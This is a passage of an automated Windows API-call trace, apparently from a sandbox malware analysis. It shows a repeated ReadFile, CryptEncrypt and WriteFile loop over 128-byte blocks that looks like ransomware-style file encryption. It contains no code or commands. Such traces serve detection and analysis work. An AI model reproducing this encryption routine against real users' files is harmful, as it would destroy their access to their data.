[0040.842] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.842] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.842] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.842] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.842] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.842] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.842] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.843] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.843] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.843] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.843] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.843] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.843] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.843] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.843] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.843] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.843] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.844] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.844] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.844] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.844] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.844] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.844] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.844] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.844] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.844] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.844] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.844] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.844] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.844] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.844] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.844] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.844] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.844] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.844] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.844] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.844] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.844] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.844] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.845] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.845] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.845] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.845] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.845] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.845] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.845] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.845] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.845] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.846] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.846] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.846] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.846] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.846] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.846] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, 